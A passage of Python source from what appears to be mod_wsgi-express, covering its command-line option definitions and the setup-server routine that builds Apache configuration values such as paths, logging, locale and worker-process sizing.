metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before timing out on a write operation back to the ' 'HTTP client when the response buffer has filled and data is ' 'being forcibly flushed. Defaults to 0 seconds indicating that ' 'it will default to the value of the \'socket-timeout\' option.') add_option('all', '--enable-sendfile', action='store_true', default=False, help='Flag indicating whether sendfile() support ' 'should be enabled. Defaults to being disabled. This should ' 'only be enabled if the operating system kernel and file system ' 'type where files are hosted supports it.') add_option('unix', '--disable-reloading', action='store_true', default=False, help='Disables all reloading of daemon processes ' 'due to changes to the file containing the WSGI application ' 'entrypoint, or any other loaded source files. This has no ' 'effect when embedded mode is used as reloading is automatically ' 'disabled for embedded mode.') add_option('unix', '--reload-on-changes', action='store_true', default=False, help='Flag indicating whether worker processes ' 'should be automatically restarted when any Python code file ' 'loaded by the WSGI application has been modified. Defaults to ' 'being disabled. When reloading on any code changes is disabled, ' 'unless all reloading is also disabled, the worker processes ' 'will still though be reloaded if the file containing the WSGI ' 'application entrypoint is modified.') add_option('unix', '--user', default=default_run_user(), metavar='USERNAME', help='When being run by the root user, ' 'the user that the WSGI application should be run as.') add_option('unix', '--group', default=default_run_group(), metavar='GROUP', help='When being run by the root user, the ' 'group that the WSGI application should be run as.') add_option('all', '--callable-object', default='application', metavar='NAME', help='The name of the entry point for the WSGI ' 'application within the WSGI script file. Defaults to ' 'the name \'application\'.') add_option('all', '--map-head-to-get', default='Auto', metavar='OFF|ON|AUTO', help='Flag indicating whether HEAD ' 'requests should be mapped to a GET request. 
By default a HEAD ' 'request will be automatically mapped to a GET request when an ' 'Apache output filter is detected that may want to see the ' 'entire response in order to set up response headers correctly ' 'for a HEAD request. This can be disable by setting to \'Off\'.') add_option('all', '--document-root', metavar='DIRECTORY-PATH', help='The directory which should be used as the document root ' 'and which contains any static files.') add_option('all', '--directory-index', metavar='FILE-NAME', help='The name of a directory index resource to be found in the ' 'document root directory. Requests mapping to the directory ' 'will be mapped to this resource rather than being passed ' 'through to the WSGI application.') add_option('all', '--directory-listing', action='store_true', default=False, help='Flag indicating if directory listing ' 'should be enabled where static file application type is ' 'being used and no directory index file has been specified.') add_option('all', '--allow-override', metavar='DIRECTIVE-TYPE', action='append', help='Allow directives to be overridden from a ' '\'.htaccess\' file. Defaults to \'None\', indicating that any ' '\'.htaccess\' file will be ignored with override directives ' 'not being permitted.') add_option('all', '--mount-point', metavar='URL-PATH', default='/', help='The URL path at which the WSGI application will be ' 'mounted. Defaults to being mounted at the root URL of the ' 'site.') add_option('all', '--url-alias', action='append', nargs=2, dest='url_aliases', metavar='URL-PATH FILE-PATH|DIRECTORY-PATH', help='Map a single static file or a directory of static files ' 'to a sub URL.') add_option('all', '--error-document', action='append', nargs=2, dest='error_documents', metavar='STATUS URL-PATH', help='Map ' 'a specific sub URL as the handler for HTTP errors generated ' 'by the web server.') add_option('all', '--error-override', action='store_true', default=False, help='Flag indicating whether Apache error ' 'documents will override application error responses.') add_option('all', '--proxy-mount-point', action='append', nargs=2, dest='proxy_mount_points', metavar='URL-PATH URL', help='Map a sub URL such that any requests against it will be ' 'proxied to the specified URL. This is only for proxying to a ' 'site as a whole, or a sub site, not individual resources.') add_option('all', '--proxy-url-alias', action='append', nargs=2, dest='proxy_mount_points', metavar='URL-PATH URL', help=optparse.SUPPRESS_HELP) add_option('all', '--proxy-virtual-host', action='append', nargs=2, dest='proxy_virtual_hosts', metavar='HOSTNAME URL', help='Proxy any requests for the specified host name to the ' 'remote URL.') add_option('all', '--trust-proxy-header', action='append', default=[], dest='trusted_proxy_headers', metavar='HEADER-NAME', help='The name of any trusted HTTP header providing details ' 'of the front end client request when proxying.') add_option('all', '--trust-proxy', action='append', default=[], dest='trusted_proxies', metavar='IP-ADDRESS/SUBNET', help='The IP address or subnet corresponding to any trusted ' 'proxy.') add_option('all', '--keep-alive-timeout', type='int', default=2, metavar='SECONDS', help='The number of seconds which a client ' 'connection will be kept alive to allow subsequent requests ' 'to be made over the same connection when a keep alive ' 'connection is requested. 
Defaults to 2, indicating that keep ' 'alive connections are set for 2 seconds.') add_option('all', '--compress-responses', action='store_true', default=False, help='Flag indicating whether responses for ' 'common text based responses, such as plain text, HTML, XML, ' 'CSS and Javascript should be compressed.') add_option('all', '--server-metrics', action='store_true', default=False, help='Flag indicating whether internal server ' 'metrics will be available within the WSGI application. ' 'Defaults to being disabled.') add_option('all', '--server-status', action='store_true', default=False, help='Flag indicating whether web server status ' 'will be available at the /server-status sub URL. Defaults to ' 'being disabled.') add_option('all', '--host-access-script', metavar='SCRIPT-PATH', default=None, help='Specify a Python script file for ' 'performing host access checks.') add_option('all', '--auth-user-script', metavar='SCRIPT-PATH', default=None, help='Specify a Python script file for ' 'performing user authentication.') add_option('all', '--auth-type', metavar='TYPE', default='Basic', help='Specify the type of authentication ' 'scheme used when authenticating users. Defaults to using ' '\'Basic\'. Alternate schemes available are \'Digest\'.') add_option('all', '--auth-group-script', metavar='SCRIPT-PATH', default=None, help='Specify a Python script file for ' 'performing group based authorization in conjunction with ' 'a user authentication script.') add_option('all', '--auth-group', metavar='NAME', default='wsgi', help='Specify the group which users should ' 'be a member of when using a group based authorization script. ' 'Defaults to \'wsgi\' as a place holder but should be ' 'overridden to be the actual group you use rather than ' 'making your group name match the default.') add_option('all', '--include-file', action='append', dest='include_files', metavar='FILE-PATH', help='Specify the ' 'path to an additional web server configuration file to be ' 'included at the end of the generated web server configuration ' 'file.') add_option('all', '--rewrite-rules', metavar='FILE-PATH', help='Specify an alternate server configuration file which ' 'contains rewrite rules. Defaults to using the ' '\'rewrite.conf\' stored under the server root directory.') add_option('unix', '--envvars-script', metavar='FILE-PATH', help='Specify an alternate script file for user defined web ' 'server environment variables. Defaults to using the ' '\'envvars\' stored under the server root directory.') add_option('unix', '--lang', default=None, metavar='NAME', help=optparse.SUPPRESS_HELP) add_option('all', '--locale', default=None, metavar='NAME', help='Specify the natural language locale for the process ' 'as normally defined by the \'LC_ALL\' environment variable. ' 'If not specified, then the default locale for this process ' 'will be used. 
If the default locale is however \'C\' or ' '\'POSIX\' then an attempt will be made to use either the ' '\'en_US.UTF-8\' or \'C.UTF-8\' locales and if that is not ' 'possible only then fallback to the default locale of this ' 'process.') add_option('all', '--setenv', action='append', nargs=2, dest='setenv_variables', metavar='KEY VALUE', help='Specify ' 'a name/value pairs to be added to the per request WSGI environ ' 'dictionary') add_option('all', '--passenv', action='append', dest='passenv_variables', metavar='KEY', help='Specify the ' 'names of any process level environment variables which should ' 'be passed as a name/value pair in the per request WSGI ' 'environ dictionary.') add_option('all', '--working-directory', metavar='DIRECTORY-PATH', help='Specify the directory which should be used as the ' 'current working directory of the WSGI application. This ' 'directory will be searched when importing Python modules ' 'so long as the WSGI application doesn\'t subsequently ' 'change the current working directory. Defaults to the ' 'directory this script is run from.') add_option('all', '--pid-file', metavar='FILE-PATH', help='Specify an alternate file to be used to store the ' 'process ID for the root process of the web server.') add_option('all', '--server-root', metavar='DIRECTORY-PATH', help='Specify an alternate directory for where the generated ' 'web server configuration, startup files and logs will be ' 'stored. On Linux defaults to the sub directory specified by ' 'the TMPDIR environment variable, or /tmp if not specified. ' 'On macOS, defaults to the /var/tmp directory.') add_option('unix', '--server-mpm', action='append', dest='server_mpm_variables', metavar='NAME', help='Specify ' 'preferred MPM to use when using Apache 2.4 with dynamically ' 'loadable MPMs and more than one is available. By default ' 'the MPM precedence order when no preference is given is ' '\"event\", \"worker" and \"prefork\".') add_option('all', '--log-directory', metavar='DIRECTORY-PATH', help='Specify an alternate directory for where the log files ' 'will be stored. Defaults to the server root directory.') add_option('all', '--log-level', default='warn', metavar='NAME', help='Specify the log level for logging. Defaults to \'warn\'.') add_option('all', '--access-log', action='store_true', default=False, help='Flag indicating whether the web server access log ' 'should be enabled. Defaults to being disabled.') add_option('unix', '--startup-log', action='store_true', default=False, help='Flag indicating whether the web server startup log should ' 'be enabled. Defaults to being disabled.') add_option('all', '--verbose-debugging', action='store_true', dest='verbose_debugging', help=optparse.SUPPRESS_HELP) add_option('unix', '--log-to-terminal', action='store_true', default=False, help='Flag indicating whether logs should ' 'be directed back to the terminal. Defaults to being disabled. ' 'If --log-directory is set explicitly, it will override this ' 'option. 
If logging to the terminal is carried out, any ' 'rotating of log files will be disabled.') add_option('all', '--access-log-format', metavar='FORMAT', help='Specify the format of the access log records.'), add_option('all', '--error-log-format', metavar='FORMAT', help='Specify the format of the error log records.'), add_option('all', '--error-log-name', metavar='FILE-NAME', default='error_log', help='Specify the name of the error ' 'log file when it is being written to the log directory.'), add_option('all', '--access-log-name', metavar='FILE-NAME', default='access_log', help='Specify the name of the access ' 'log file when it is being written to the log directory.'), add_option('unix', '--startup-log-name', metavar='FILE-NAME', default='startup_log', help='Specify the name of the startup ' 'log file when it is being written to the log directory.'), add_option('unix', '--rotate-logs', action='store_true', default=False, help='Flag indicating whether log rotation should be performed.'), add_option('unix', '--max-log-size', default=5, type='int', metavar='MB', help='The maximum size in MB the log file should ' 'be allowed to reach before log file rotation is performed.'), add_option('unix', '--rotatelogs-executable', default=apxs_config.ROTATELOGS, metavar='FILE-PATH', help='Override the path to the rotatelogs executable.'), add_option('all', '--python-path', action='append', dest='python_paths', metavar='DIRECTORY-PATH', help='Specify ' 'the path to any additional directory that should be added to ' 'the Python module search path. Note that these directories will ' 'not be processed for \'.pth\' files. If processing of \'.pth\' ' 'files is required, set the \'PYTHONPATH\' environment variable ' 'in a script specified by the \'--envvars-script\' option.') add_option('all', '--python-eggs', metavar='DIRECTORY-PATH', help='Specify an alternate directory which should be used for ' 'unpacking of Python eggs. Defaults to a sub directory of ' 'the server root directory.') add_option('unix', '--shell-executable', default=SHELL, metavar='FILE-PATH', help='Override the path to the shell ' 'used in the \'apachectl\' script. The \'bash\' shell will ' 'be used if available.') add_option('unix', '--httpd-executable', default=apxs_config.HTTPD, metavar='FILE-PATH', help='Override the path to the Apache web ' 'server executable.') add_option('unix', '--process-name', metavar='NAME', help='Override ' 'the name given to the Apache parent process. 
This might be ' 'needed when a process manager expects the process to be named ' 'a certain way but due to a sequence of exec calls the name ' 'changed.') add_option('all', '--modules-directory', default=apxs_config.LIBEXECDIR, metavar='DIRECTORY-PATH', help='Override the path to the Apache ' 'web server modules directory.') add_option('unix', '--mime-types', default=find_mimetypes(), metavar='FILE-PATH', help='Override the path to the mime types ' 'file used by the web server.') add_option('unix', '--socket-prefix', metavar='DIRECTORY-PATH', help='Specify an alternate directory name prefix to be used ' 'for the UNIX domain sockets used by mod_wsgi to communicate ' 'between the Apache child processes and the daemon processes.') add_option('all', '--add-handler', action='append', nargs=2, dest='handler_scripts', metavar='EXTENSION SCRIPT-PATH', help='Specify a WSGI application to be used as a special ' 'handler for any resources matched from the document root ' 'directory with a specific extension type.') add_option('all', '--chunked-request', action='store_true', default=False, help='Flag indicating whether requests which ' 'use chunked transfer encoding will be accepted.') add_option('hidden', '--with-newrelic', action='store_true', default=False, help='Flag indicating whether all New Relic ' 'performance monitoring features should be enabled.') add_option('hidden', '--with-newrelic-agent', action='store_true', default=False, help='Flag indicating whether the New Relic ' 'Python agent should be enabled for reporting application server ' 'metrics.') add_option('hidden', '--with-newrelic-platform', action='store_true', default=False, help='Flag indicating whether the New Relic ' 'platform plugin should be enabled for reporting server level ' 'metrics.') add_option('hidden', '--newrelic-config-file', metavar='FILE-PATH', default='', help='Specify the location of the New Relic agent ' 'configuration file.') add_option('hidden', '--newrelic-environment', metavar='NAME', default='', help='Specify the name of the environment section ' 'that should be used from New Relic agent configuration file.') add_option('hidden', '--with-php5', action='store_true', default=False, help='Flag indicating whether PHP 5 support should be enabled. ' 'PHP code files must use the \'.php\' extension.') add_option('all', '--with-cgi', action='store_true', default=False, help='Flag indicating whether CGI script support should be ' 'enabled. CGI scripts must use the \'.cgi\' extension and be ' 'executable') add_option('unix', '--service-script', action='append', nargs=2, dest='service_scripts', metavar='SERVICE SCRIPT-PATH', help='Specify the name of a Python script to be loaded and ' 'executed in the context of a distinct daemon process. 
Used ' 'for running a managed service.') add_option('unix', '--service-user', action='append', nargs=2, dest='service_users', metavar='SERVICE USERNAME', help='When being run by the root user, the user that the ' 'distinct daemon process started to run the managed service ' 'should be run as.') add_option('unix', '--service-group', action='append', nargs=2, dest='service_groups', metavar='SERVICE GROUP', help='When being run by the root user, the group that the ' 'distinct daemon process started to run the managed service ' 'should be run as.') add_option('unix', '--service-log-file', action='append', nargs=2, dest='service_log_files', metavar='SERVICE FILE-NAME', help='Specify the name of a separate log file to be used for ' 'the managed service.') add_option('all', '--destroy-interpreter', action='store_true', default=False, help='Flag indicating whether the Python ' 'interpreter should be destroyed on process shutdown.') add_option('unix', '--embedded-mode', action='store_true', default=False, help='Flag indicating whether to run in embedded mode rather ' 'than the default daemon mode. Numerous daemon mode specific ' 'features will not operate when this mode is used.') add_option('all', '--enable-docs', action='store_true', default=False, help='Flag indicating whether the mod_wsgi documentation should ' 'be made available at the /__wsgi__/docs sub URL.') add_option('unix', '--debug-mode', action='store_true', default=False, help='Flag indicating whether to run in single process mode ' 'to allow the running of an interactive Python debugger. This ' 'will override all options related to processes, threads and ' 'communication with workers. All forms of source code reloading ' 'will also be disabled. Both stdin and stdout will be attached ' 'to the console to allow interaction with the Python debugger.') add_option('unix', '--enable-debugger', action='store_true', default=False, help='Flag indicating whether post mortem ' 'debugging of any exceptions which propagate out from the ' 'WSGI application when running in debug mode should be ' 'performed. 
Post mortem debugging is performed using the ' 'Python debugger (pdb).'), add_option('unix', '--debugger-startup', action='store_true', default=False, help='Flag indicating whether when post ' 'mortem debugging is enabled, that the debugger should ' 'also be thrown into the interactive console on initial ' 'startup of the server to allow breakpoints to be setup.'), add_option('unix', '--enable-coverage', action='store_true', default=False, help='Flag indicating whether coverage analysis ' 'is enabled when running in debug mode.') add_option('unix', '--coverage-directory', metavar='DIRECTORY-PATH', default='', help='Override the path to the directory into ' 'which coverage analysis will be generated when enabled under ' 'debug mode.') add_option('unix', '--enable-profiler', action='store_true', default=False, help='Flag indicating whether code profiling ' 'is enabled when running in debug mode.') add_option('unix', '--profiler-directory', metavar='DIRECTORY-PATH', default='', help='Override the path to the directory into ' 'which profiler data will be written when enabled under debug ' 'mode.') add_option('unix', '--enable-recorder', action='store_true', default=False, help='Flag indicating whether recording of ' 'requests is enabled when running in debug mode.') add_option('unix', '--recorder-directory', metavar='DIRECTORY-PATH', default='', help='Override the path to the directory into ' 'which recorder data will be written when enabled under debug ' 'mode.') add_option('unix', '--enable-gdb', action='store_true', default=False, help='Flag indicating whether Apache should ' 'be run under \'gdb\' when running in debug mode. This ' 'would be use to debug process crashes.') add_option('unix', '--gdb-executable', default='gdb', metavar='FILE-PATH', help='Override the path to the gdb ' 'executable.') add_option('unix', '--setup-only', action='store_true', default=False, help='Flag indicating that after the configuration files have ' 'been setup, that the command should then exit and not go on ' 'to actually run up the Apache server. This is to allow for ' 'the generation of the configuration with Apache then later ' 'being started separately using the generated \'apachectl\' ' 'script.') # add_option('unix', '--isatty', action='store_true', default=False, # help='Flag indicating whether should assume being run in an ' # 'interactive terminal session. In this case Apache will not ' # 'replace this wrapper script, but will be run as a sub process.' # 'Signals such as SIGINT, SIGTERM, SIGHUP and SIGUSR1 will be ' # 'forwarded onto Apache, but SIGWINCH will be blocked so that ' # 'resizing of a terminal session window will not cause Apache ' # 'to shutdown. 
This is a separate option at this time rather ' # 'than being determined automatically while the reliability of ' # 'intercepting and forwarding signals is verified.') def cmd_setup_server(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog setup-server script [options]' parser = optparse.OptionParser(usage=usage, option_list=option_list, formatter=formatter) (options, args) = parser.parse_args(params) _cmd_setup_server('setup-server', args, vars(options)) def _mpm_module_defines(modules_directory, preferred=None): if os.name == 'nt': return ['-DMOD_WSGI_MPM_ENABLE_WINNT_MODULE'] result = [] workers = ['event', 'worker', 'prefork'] found = False for name in workers: if not preferred or name in preferred: if os.path.exists(os.path.join(modules_directory, 'mod_mpm_%s.so' % name)): if not found: result.append('-DMOD_WSGI_MPM_ENABLE_%s_MODULE' % name.upper()) found = True result.append('-DMOD_WSGI_MPM_EXISTS_%s_MODULE' % name.upper()) return result def _cmd_setup_server(command, args, options): options['sys_argv'] = repr(sys.argv) options['mod_wsgi_so'] = where() options['working_directory'] = options['working_directory'] or os.getcwd() options['working_directory'] = os.path.abspath(options['working_directory']) if not options['host']: options['listener_host'] = None options['host'] = 'localhost' else: options['listener_host'] = options['host'] if os.name == 'nt': options['daemon_name'] = '(wsgi:%s:%s:%s)' % (options['host'], options['port'], getpass.getuser()) else: options['daemon_name'] = '(wsgi:%s:%s:%s)' % (options['host'], options['port'], os.getuid()) if not options['server_root']: if os.name == 'nt': tmpdir = tempfile.gettempdir() elif sys.platform == 'darwin': tmpdir = '/var/tmp' else: tmpdir = os.environ.get('TMPDIR') tmpdir = tmpdir or '/tmp' tmpdir = tmpdir.rstrip('/') if os.name == 'nt': options['server_root'] = ('%s/mod_wsgi-%s-%s-%s' % (tmpdir, options['host'], options['port'], getpass.getuser()) ).replace('\\','/') else: options['server_root'] = '%s/mod_wsgi-%s:%s:%s' % (tmpdir, options['host'], options['port'], os.getuid()) if not os.path.isdir(options['server_root']): os.mkdir(options['server_root']) if options['ssl_certificate_file']: options['ssl_certificate_file'] = os.path.abspath( options['ssl_certificate_file']) if options['ssl_certificate_key_file']: options['ssl_certificate_key_file'] = os.path.abspath( options['ssl_certificate_key_file']) if options['ssl_certificate']: options['ssl_certificate'] = os.path.abspath( options['ssl_certificate']) options['ssl_certificate_file'] = options['ssl_certificate'] options['ssl_certificate_file'] += '.crt' options['ssl_certificate_key_file'] = options['ssl_certificate'] options['ssl_certificate_key_file'] += '.key' if options['ssl_ca_certificate_file']: options['ssl_ca_certificate_file'] = os.path.abspath( options['ssl_ca_certificate_file']) if options['ssl_certificate_chain_file']: options['ssl_certificate_chain_file'] = os.path.abspath( options['ssl_certificate_chain_file']) if options['entry_point']: args = [options['entry_point']] if not args: if options['application_type'] != 'static': options['entry_point'] = posixpath.join( options['server_root'], 'default.wsgi') options['application_type'] = 'script' options['enable_docs'] = True else: if not options['document_root']: options['document_root'] = os.getcwd() options['entry_point'] = '(static)' else: if options['application_type'] in ('script', 'paste'): options['entry_point'] = posixpath.abspath(args[0]) elif 
options['application_type'] == 'static': if not options['document_root']: options['document_root'] = posixpath.abspath(args[0]) options['entry_point'] = 'ignored' else: options['entry_point'] = 'overridden' else: options['entry_point'] = args[0] if options['host_access_script']: options['host_access_script'] = posixpath.abspath( options['host_access_script']) if options['auth_user_script']: options['auth_user_script'] = posixpath.abspath( options['auth_user_script']) if options['auth_group_script']: options['auth_group_script'] = posixpath.abspath( options['auth_group_script']) options['documentation_directory'] = os.path.join(os.path.dirname( os.path.dirname(__file__)), 'docs') options['images_directory'] = os.path.join(os.path.dirname( os.path.dirname(__file__)), 'images') if os.path.exists(posixpath.join(options['documentation_directory'], 'index.html')): options['documentation_url'] = '/__wsgi__/docs/' else: options['documentation_url'] = 'http://www.modwsgi.org/' if not os.path.isabs(options['server_root']): options['server_root'] = posixpath.abspath(options['server_root']) if not options['document_root']: options['document_root'] = posixpath.join(options['server_root'], 'htdocs') try: os.mkdir(options['document_root']) except Exception: pass if not options['allow_override']: options['allow_override'] = 'None' else: options['allow_override'] = ' '.join(options['allow_override']) if not options['mount_point'].startswith('/'): options['mount_point'] = posixpath.normpath('/' + options['mount_point']) # Create subdirectories for mount points in document directory # so that fallback resource rewrite rule will work. if options['mount_point'] != '/': parts = options['mount_point'].rstrip('/').split('/')[1:] subdir = options['document_root'] try: for part in parts: subdir = posixpath.join(subdir, part) if not os.path.exists(subdir): os.mkdir(subdir) except Exception: raise if not os.path.isabs(options['document_root']): options['document_root'] = posixpath.abspath(options['document_root']) if not options['log_directory']: options['log_directory'] = options['server_root'] else: # The --log-directory option overrides --log-to-terminal. options['log_to_terminal'] = False if options['log_to_terminal']: # The --log-to-terminal option overrides --rotate-logs. 
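        # Precedence sketch (hypothetical command lines, for illustration
        # only): with '--log-directory /srv/logs --log-to-terminal', the
        # explicit log directory has already forced 'log_to_terminal' off
        # above, so this branch is skipped and any '--rotate-logs' setting
        # survives; with '--log-to-terminal' alone, the log directory
        # defaults to the server root and log rotation is disabled here.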
options['rotate_logs'] = False try: os.mkdir(options['log_directory']) except Exception: pass if not os.path.isabs(options['log_directory']): options['log_directory'] = posixpath.abspath(options['log_directory']) if not options['log_to_terminal']: options['error_log_file'] = posixpath.join(options['log_directory'], options['error_log_name']) else: if os.name == 'nt': options['error_log_file'] = 'CON' else: try: with open('/dev/stderr', 'w'): pass except IOError: options['error_log_file'] = '|%s' % find_program( ['tee'], default='tee') else: options['error_log_file'] = '/dev/stderr' if not options['log_to_terminal']: options['access_log_file'] = posixpath.join( options['log_directory'], options['access_log_name']) else: try: with open('/dev/stdout', 'w'): pass except IOError: options['access_log_file'] = '|%s' % find_program( ['tee'], default='tee') else: options['access_log_file'] = '/dev/stdout' if options['access_log_format']: if options['access_log_format'] in ('common', 'combined'): options['log_format_nickname'] = options['access_log_format'] options['access_log_format'] = 'undefined' else: options['log_format_nickname'] = 'custom' else: options['log_format_nickname'] = 'common' options['access_log_format'] = 'undefined' options['access_log_format'] = options['access_log_format'].replace( '\"', '\\"') if options['error_log_format']: options['error_log_format'] = options['error_log_format'].replace( '\"', '\\"') options['pid_file'] = ((options['pid_file'] and posixpath.abspath( options['pid_file'])) or posixpath.join(options['server_root'], 'httpd.pid')) options['python_eggs'] = (posixpath.abspath(options['python_eggs']) if options['python_eggs'] is not None else None) if options['python_eggs'] is None: options['python_eggs'] = posixpath.join(options['server_root'], 'python-eggs') try: os.mkdir(options['python_eggs']) if os.name != 'nt' and os.getuid() == 0: import pwd import grp os.chown(options['python_eggs'], pwd.getpwnam(options['user']).pw_uid, grp.getgrnam(options['group']).gr_gid) except Exception: pass if options['python_paths'] is None: options['python_paths'] = [] if options['debug_mode'] or options['embedded_mode']: if options['working_directory'] not in options['python_paths']: options['python_paths'].insert(0, options['working_directory']) if options['debug_mode']: options['server_mpm_variables'] = ['worker', 'prefork'] elif options['embedded_mode']: if not options['server_mpm_variables']: options['server_mpm_variables'] = ['worker', 'prefork'] # Special case to check for when being executed from shiv variant # of a zipapp application bundle. We need to work out where the # site packages directory is and pass it with Python module search # path so is known about by the Apache sub process when executed. 
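    # Sketch of the detection below (the '_bootstrap' module and the
    # 'site_packages' frame local are what the loop inspects; the path is
    # a hypothetical example): when running from a shiv-built zipapp, the
    # bootstrap() frame typically carries a 'site_packages' local such as
    # '~/.shiv/myapp_abc123/site-packages', and that directory gets added
    # to the module search path passed through to the Apache sub process.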
    site_packages = []

    if '_bootstrap' in sys.modules:
        bootstrap = sys.modules['_bootstrap']
        if 'bootstrap' in dir(bootstrap):
            frame = inspect.currentframe()
            while frame is not None:
                code = frame.f_code
                if (code and code.co_filename == bootstrap.__file__ and
                        code.co_name == 'bootstrap' and
                        'site_packages' in frame.f_locals):
                    site_packages.append(str(frame.f_locals['site_packages']))
                    break
                frame = frame.f_back

    options['python_paths'].extend(site_packages)

    options['python_path'] = ':'.join(options['python_paths'])

    options['multiprocess'] = options['processes'] is not None
    options['processes'] = options['processes'] or 1

    options['python_home'] = sys.prefix.replace('\\','/')

    options['keep_alive'] = options['keep_alive_timeout'] != 0

    request_read_timeout = ''

    if options['header_timeout'] > 0:
        request_read_timeout += 'header=%d' % options['header_timeout']
        if options['header_max_timeout'] > 0:
            request_read_timeout += '-%d' % options['header_max_timeout']
        if options['header_min_rate'] > 0:
            request_read_timeout += ',MinRate=%d' % options['header_min_rate']

    if options['body_timeout'] > 0:
        request_read_timeout += ' body=%d' % options['body_timeout']
        if options['body_max_timeout'] > 0:
            request_read_timeout += '-%d' % options['body_max_timeout']
        if options['body_min_rate'] > 0:
            request_read_timeout += ',MinRate=%d' % options['body_min_rate']

    options['request_read_timeout'] = request_read_timeout

    if options['server_metrics']:
        options['server_metrics_flag'] = 'On'
    else:
        options['server_metrics_flag'] = 'Off'

    if options['handler_scripts']:
        handler_scripts = []
        for extension, script in options['handler_scripts']:
            if not os.path.isabs(script):
                script = posixpath.abspath(script)
            handler_scripts.append((extension, script))
        options['handler_scripts'] = handler_scripts

    if options['newrelic_config_file']:
        options['newrelic_config_file'] = posixpath.abspath(
                options['newrelic_config_file'])

    if options['with_newrelic']:
        options['with_newrelic_agent'] = True
        options['with_newrelic_platform'] = True

    if options['with_newrelic_platform']:
        options['server_metrics'] = True

    if options['service_scripts']:
        service_scripts = []
        for name, script in options['service_scripts']:
            if not os.path.isabs(script):
                script = posixpath.abspath(script)
            service_scripts.append((name, script))
        options['service_scripts'] = service_scripts

    # Note that all the below calculations are overridden if using
    # embedded mode.
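    # Worked example (hypothetical option values, for illustration only):
    # with '--processes 5 --threads 5' and no '--max-clients', the code
    # below computes max_clients = 10 + max(10, int(1.5 * 25)) = 47. With
    # the default ratios this yields prefork_start_servers = 2,
    # prefork_min_spare_servers = 2 and prefork_max_spare_servers = 4,
    # while the worker sizing becomes worker_threads_per_child = 15,
    # worker_server_limit = 4 (so worker_max_clients is rounded up to 60),
    # worker_start_servers = 1, worker_min_spare_threads = 15 and
    # worker_max_spare_threads = 30.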
max_clients = options['processes'] * options['threads'] if options['max_clients'] is not None: max_clients = max(options['max_clients'], max_clients) else: max_clients = 10 + max(10, int(1.5 * max_clients)) initial_workers = options['initial_workers'] min_spare_workers = options['minimum_spare_workers'] max_spare_workers = options['maximum_spare_workers'] if initial_workers is None: prefork_initial_workers = 0.05 else: prefork_initial_workers = initial_workers if min_spare_workers is None: prefork_min_spare_workers = prefork_initial_workers else: prefork_min_spare_workers = min_spare_workers if max_spare_workers is None: prefork_max_spare_workers = 0.1 else: prefork_max_spare_workers = max_spare_workers options['prefork_max_clients'] = max_clients options['prefork_server_limit'] = max_clients options['prefork_start_servers'] = max(1, int( prefork_initial_workers * max_clients)) options['prefork_min_spare_servers'] = max(1, int( prefork_min_spare_workers * max_clients)) options['prefork_max_spare_servers'] = max(1, int( prefork_max_spare_workers * max_clients)) if initial_workers is None: worker_initial_workers = 0.2 else: worker_initial_workers = initial_workers if min_spare_workers is None: worker_min_spare_workers = worker_initial_workers else: worker_min_spare_workers = min_spare_workers if max_spare_workers is None: worker_max_spare_workers = 0.6 else: worker_max_spare_workers = max_spare_workers options['worker_max_clients'] = max_clients if max_clients > 20: options['worker_threads_per_child'] = int(max_clients / (int(max_clients / 20) + 1)) else: options['worker_threads_per_child'] = 10 options['worker_thread_limit'] = options['worker_threads_per_child'] count = max_clients / options['worker_threads_per_child'] options['worker_server_limit'] = int(math.floor(count)) if options['worker_server_limit'] != count: options['worker_server_limit'] += 1 options['worker_max_clients'] = (options['worker_server_limit'] * options['worker_threads_per_child']) options['worker_start_servers'] = max(1, int(worker_initial_workers * options['worker_server_limit'])) options['worker_min_spare_threads'] = max( options['worker_threads_per_child'], int(worker_min_spare_workers * options['worker_server_limit']) * options['worker_threads_per_child']) options['worker_max_spare_threads'] = max( options['worker_threads_per_child'], int(worker_max_spare_workers * options['worker_server_limit']) * options['worker_threads_per_child']) if options['embedded_mode']: max_clients = options['processes'] * options['threads'] options['prefork_max_clients'] = max_clients options['prefork_server_limit'] = max_clients options['prefork_start_servers'] = max_clients options['prefork_min_spare_servers'] = max_clients options['prefork_max_spare_servers'] = max_clients options['worker_max_clients'] = max_clients options['worker_server_limit'] = options['processes'] options['worker_thread_limit'] = options['threads'] options['worker_threads_per_child'] = options['threads'] options['worker_start_servers'] = options['processes'] options['worker_min_spare_threads'] = max_clients options['worker_max_spare_threads'] = max_clients options['httpd_conf'] = posixpath.join(options['server_root'], 'httpd.conf') options['httpd_executable'] = os.environ.get('HTTPD', options['httpd_executable']) if os.name != 'nt': if not os.path.isabs(options['httpd_executable']): options['httpd_executable'] = find_program( [options['httpd_executable']], 'httpd', ['/usr/sbin']) if not options['process_name']: options['process_name'] = posixpath.basename( 
options['httpd_executable']) + ' (mod_wsgi-express)' options['process_name'] = options['process_name'].ljust( len(options['daemon_name'])) options['rewrite_rules'] = (posixpath.abspath( options['rewrite_rules']) if options['rewrite_rules'] is not None else None) options['envvars_script'] = (posixpath.abspath( options['envvars_script']) if options['envvars_script'] is not None else None) if options['locale'] is None: options['locale'] = options['lang'] if options['locale'] is None: language, encoding = locale.getdefaultlocale() if language is None: language = 'C' if encoding is None: options['locale'] = locale.normalize(language) else: options['locale'] = locale.normalize(language + '.' + encoding) if options['locale'].upper() in ('C', 'POSIX'): oldlocale = locale.setlocale(locale.LC_ALL) try: locale.setlocale(locale.LC_ALL, 'en_US.UTF-8') options['locale'] = 'en_US.UTF-8' except locale.Error: try: locale.setlocale(locale.LC_ALL, 'C.UTF-8') options['locale'] = 'C.UTF-8' except locale.Error: pass locale.setlocale(locale.LC_ALL, oldlocale) options['lang'] = options['locale'] options['httpd_arguments_list'] = [] options['trusted_proxy_headers'] = ' '.join( options['trusted_proxy_headers']) options['trusted_proxies'] = ' '.join(options['trusted_proxies']) if options['startup_log']: if not options['log_to_terminal']: options['startup_log_file'] = posixpath.join( options['log_directory'], options['startup_log_name']) else: if os.name == 'nt': options['startup_log_file'] = 'CON' else: try: with open('/dev/stderr', 'w'): pass except IOError: try: with open('/dev/tty', 'w'): pass except IOError: options['startup_log_file'] = None else: options['startup_log_file'] = '/dev/tty' else: options['startup_log_file'] = '/dev/stderr' if options['startup_log_file']: options['httpd_arguments_list'].append('-E') options['httpd_arguments_list'].append(options['startup_log_file']) if options['verbose_debugging']: options['verbose_debugging_flag'] = 'On' else: options['verbose_debugging_flag'] = 'Off' if options['server_name']: host = options['server_name'] else: host = options['host'] options['server_host'] = host if options['port'] == 80: 